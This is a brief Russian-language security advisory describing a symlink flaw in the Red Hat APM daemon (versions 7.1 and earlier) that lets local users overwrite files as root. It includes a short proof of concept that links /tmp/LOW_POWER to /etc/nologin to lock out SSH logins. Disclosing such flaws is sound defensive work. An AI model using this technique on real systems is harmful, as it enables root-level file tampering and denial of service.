Демон Расширенного управление питанием (Advanced Power Management), поставляемый с некоторыми версиями RedHat, содержит уязвимость символьных линков (в файле tmp/LOW_POWER), которая позволяет локальному пользователю записывать поверх и создавать файлы с привилегиями
администратора.

Уязвимы Red Hat 7.1 и более ранние версии.

Пример:
$ ssh foo
$ exit

$ ln -s /etc/nologin /tmp/LOW_POWER
…[provoke low-battery state; e.g. cut powerline and wait some time] …

$ ssh foo
Connection to foo closed.
$



Оставить мнение